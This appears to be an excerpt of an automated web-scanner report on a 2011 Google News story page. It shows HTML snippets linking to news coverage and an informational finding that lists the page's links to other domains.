<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw " title="Washington Post"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-WrEkuynH2TOuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html" class="usg-AFQjCNFHdQBswSmk7lUOk4Kcm7YBf0nwUw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHVqavhl78e1BGRhCFhDpMYchxwag " href="http://www.reuters.com/article/idUSN2525409520110125" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-25/dupont-sees-year-eps-3-45-3-75-saw-3-30-3-60-est-3-51.html" target="_blank" class="usg-AFQjCNExpii4NsuowkXIJMgslKUqBurpMA " id="MAA4AEgTUAFgAmoCdXM">DuPont Profit Drops Less Than Expected; 2011 Forecast Raised</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.marketwatch.com/story/us-stock-futures-slip-amid-earnings-deluge-2011-01-25?reflink=MW_news_stmp" target="_blank" class="usg-AFQjCNGcimztEVak-LjOqD7putfXoCzopQ " id="MAA4AEgTUAJgAmoCdXM">U.S. stock futures slip amid earnings deluge</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEi4oP6I32sCYAUCVJ2U9leGd96ag " href="http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&SM=1" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF3rk8geCFqCOxy1HwxiPyW1MZdvA " href="http://blogs.wsj.com/marketbeat/2011/01/25/dupont-results-top-views-as-revenue-jumps/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/" class="usg-AFQjCNHXhvYT3CqqZhrlK0TlJfWxK54_Pw "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHsmAqMdXC30FFaEw2W0lsv51aXOA " href="http://online.wsj.com/article/SB20001424052748703555804576102350092762930.html" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=AMxZxlkv-6o">Video: 
Loughner Pleads Not Guilty in AZ Shooting
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://thecrimereport.org/2011/01/25/tucson-shooting-turning-point-in-death-penalty-debate/" target="_blank" class="usg-AFQjCNEgLCP1DEJ1f5ynlwK35JzR9GyByQ " id="MAA4AEgUUAFgAmoCdXM">Tucson Shooting: Turning Point In Death Penalty Debate?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHzje_hMOUVpDUGpEX9sojDHX2M6w " href="http://www.npr.org/blogs/thetwo-way/2011/01/25/133188453/loughner-pleads-not-guilty" id="MAA4AEgUUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIeq_Ns7Eg3Q1K7muYce5YVqST7Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGclM7GNS2RlRwDlY-I5Sh_tvXrlA " href="http://www.latimes.com/news/nationworld/nation/la-na-jared-loughner-20110125,0,2181209.story" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg " title="Portfolio.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/9nA0qAvPpJ5tCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg "> Portfolio.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF2jLGtCargCIeSkIo7qnfEjTTITg " href="http://www.marketwatch.com/story/us-stock-futures-hold-losses-after-housing-data-2011-01-25" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704698004576103613884707694.html" target="_blank" class="usg-AFQjCNH63dxEzu3MUjCj-H7fBq6jy9-OXg " id="MAA4AEgVUAFgAmoCdXM">Futures Slip On Earnings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.foxnews.com/us/2011/01/25/earnings-decide-dow-breaks/" target="_blank" class="usg-AFQjCNEBWRfEEp_6PdxYPJ5HwDtXamG8ZQ " id="MAA4AEgVUAJgAmoCdXM">Earnings will decide if Dow breaks 12000</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEcBCxBebysAaamuuqoGdU6r2WTlQ " href="http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQ6-PRUCNN72J9NA3j8YhrRK9cag " href="http://money.cnn.com/2011/01/25/markets/premarkets/" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF1V9J-cnX-p6mS5xywLk2umDsG7w " href="http://www.foxbusiness.com/markets/2011/01/24/futures-hint-mini-pullback/" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHn26B9FGrLg4s4yok5aUh5NlOiQg " href="http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164" class="usg-AFQjCNFh7oZXmYPsrkHidNIVJIVXCMrg9g " title="WIVB"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/aX1Xki1PujqpGM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164" class="usg-AFQjCNFh7oZXmYPsrkHidNIVJIVXCMrg9g "> WIVB </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHjH1z5wN7WOzviGRO9bpMAi351Fg " href="http://www.seattlepi.com/local/6420ap_or_oregon_officer_shot.html" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012401933.html" target="_blank" class="usg-AFQjCNECWBY8E7oDMRNhDFvDT5-cxhhiQw " id="MAA4AEgWUAFgAmoCdXM">Police name suspect in shooting of Ore. officer</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.katu.com/news/local/114534899.html" target="_blank" class="usg-AFQjCNH8vXNZ49ZhukURxkch28NhnOq1xA " id="MAA4AEgWUAJgAmoCdXM">Manhunt continues; police keep watchful eye on suspect's home</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGB-qG_jv4ioi7srNTJx6GDo-ouDA " href="http://www.oregonlive.com/pacific-northwest-news/index.ssf/2011/01/wounded_cop_was_lincoln_citys_officer_of_the_year_in_2010.html" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFOK9Qvotaql3EqPPnwyx6wvU6Rjw " href="http://www.registerguard.com/csp/cms/sites/web/news/cityregion/25811732-57/police-waldport-monday-miranda-durham.csp" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHgw0sl8LdkN0tfDQKJmiykFpyohA " href="http://www.kptv.com/news/26603915/detail.html" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHTp5vA6GZBUZKOS7WdQRUkzL5exA " href="http://www.kval.com/news/local/114511039.html" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGPzQOAl5Cv_02XyR4hgK9rYzyHHA " href="http://www.foxnews.com/world/2011/01/25/medvedev-says-security-bombed-airport-poor/" id="8818998889059102899"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEorucr3owb2THD4rNv5uR-V_q9yg " href="http://www.foxnews.com/us/2011/01/24/authorities-fear-cops-targeted-officers-shot-hours/?test=latestnews" id="-2859349458615803843"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" id="8224434751009200465"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8fU_m8FGFR4iKSXsJpk066N5qag " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/southbound_bw_parkway_blocked.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFC1EBvU7F5yxK5gU4tz5-ZypPThg " href="http://voices.washingtonpost.com/capitalsinsider/braden-holtby/another-strong-performance-by.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGIrAh-rw28mhCKWop2qRMpETy2Ow " href="http://www.politico.com/news/stories/0111/48087.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEUzV7_ZmIL7u4HIu96A-yjfDW-Hw " href="http://www.latimes.com/news/nationworld/nation/la-na-tombstone-20110123,0,7161951.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH7t8T2ZuGQS4OfN9KxLM60oQv9Xw " href="http://www.foxbusiness.com/markets/2011/01/19/ski-resorts-reap-profits-unlikely-sources/" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHWI6XCGjzDiO52UVI_sjvLng7rZg " href="http://www.cnn.com/2011/CRIME/01/25/police.officers.shot/" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEWOKGgwZuldN3XpHTlAOn_Px9DQw " href="http://www.nytimes.com/2011/01/23/books/review/Ryerson-t.html" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUCjFx0FGX7-2UQuwKW0tsjdNQ4Q " href="http://www.usatoday.com/travel/destinations/2011-01-20-dominican-republic-cheap-resort_N.htm" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFDSngTqWuarCK7zDSbK6E0DNrb1Q " href="http://tech.fortune.cnn.com/2011/01/25/today-in-tech-ipad-2-camera-nycs-new-digital-officer/?section=magazines_fortune" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHhWLxBM_njab00Iw569pvgKUJAJw " href="http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFNJ-0kb1mKjqFEMLNmp3UsDAHMQg " href="http://www.huffingtonpost.com/2011/01/21/glenn-beck-target-frances_n_812268.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGW2sFdZD4IVaRH_iTyOSw3pywQfQ " href="http://www.fool.com/investing/general/2011/01/21/the-outstanding-dividend-stock-im-buying-now.aspx" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/ZfhFBl-goZk/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/ZfhFBl-goZk/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=ZfhFBl-goZk">Moscow Airport Attack Kills 35, Wounds 180</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=ZfhFBl-goZk">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/F3y6v2G97pg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/F3y6v2G97pg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=F3y6v2G97pg">NEED TO KNOW | The dogs are alright: The Vick dogs make a comeback <b>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=F3y6v2G97pg">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/CWAuaVf-QPI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/CWAuaVf-QPI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=CWAuaVf-QPI">How Severe Is Europe's Intertwined Debt Crisis?</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=CWAuaVf-QPI">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Domodedovo blast masterminds proud of terror 'fundraiser' - Peter Lavelle</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEwNzQqdJM1IGgZz5gvrPXeNayR4Q " href="http://mashable.com/2011/01/24/the-history-of-social-media-infographic/" id="8884752361001821321"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHMWK2sO6xALZ8Noc1IU30kHMomlA " href="http://www.msnbc.msn.com/id/41241414/ns/us_news-wikileaks_in_security/" id="3347817467129831786"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFjUhx014npXqTl_gR5gFJBq02CSg " href="http://marquee.blogs.cnn.com/2011/01/24/oprahs-big-announcement/" id="3977728706156181977"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHqGxATg1fYo0u1F98uoyT5teTfkg " href="http://newsfeed.time.com/2011/01/24/faithful-facebook-pope-benedict-blesses-social-networking/" id="4107276558132002441"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGrXAJbJAfabV2P53NOL_xQOEdL7A " href="http://www.huffingtonpost.com/2011/01/24/rahm-emanuel-mayor-chicago_n_813126.html" id="2278659535596862927"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH9hhCvfvWIOxbh2PAr-0LpnBbUgw " href="http://today.msnbc.msn.com/id/41248994/ns/today-entertainment/" id="-7437864668343822492"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEaqfRvY7dos0yZG31Guz8NVyfl7Q " href="http://www.huffingtonpost.com/2011/01/20/hundreds-of-dead-birds-in_n_811709.html" id="-7920089245397278610"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHMWK2sO6xALZ8Noc1IU30kHMomlA " href="http://www.msnbc.msn.com/id/41241414/ns/us_news-wikileaks_in_security/" id="3347817467129831786"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHGoSTKljD7CPe2BKYwtlGd4w2MIw " href="http://bits.blogs.nytimes.com/2011/01/18/now-at-starbucks-buy-a-latte-by-waving-your-phone/" id="-6291714702642255726"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHcVMhnzzMyCpJmDU1cPVagYhNUlw " href="http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" id="7471793345502520458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGHvrAgHhdbQ23w7k0W6bDzY8Wb_Q " href="http://www.nytimes.com/2011/01/05/education/05tablets.html" id="-6175099262534847598"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEEMnWgLvAeICGYU6qhmMbZdYLsAA " href="http://tv.gawker.com/5735192/watch-ricky-gervais-extremely-uncomfortable-golden-globes-monologue" id="3436666136491683511"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a> - <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.108. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The page was loaded from a URL containing a query string:

http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38

The response contains the following links to other domains:

http://abcnews.go.com/Business/wireStory?id=12751095
http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000
http://abcnews.go.com/US/wireStory?id=12742296
http://allafrica.com/stories/201101242014.html
http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars
http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars
http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0
http://chicago.gopride.com/news/article.cfm/articleid/16138036
http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html
http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1
http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf
http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1
http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1
http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/
http://en.rian.ru/russia/20110125/162282705.html
http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html
http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html
http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316
http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639
http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7
http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/
http://googlenewsblog.blogspot.com/
http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html
http://i.ytimg.com/vi/Ay5CfV-_438/default.jpg
http://i.ytimg.com/vi/QMHmzs0RsUA/default.jpg
http://i.ytimg.com/vi/THO8bb8v_Xs/default.jpg
http://i.ytimg.com/vi/_XOgAa7BN-o/default.jpg
http://i.ytimg.com/vi/uwXNpYAgahg/default.jpg
http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/
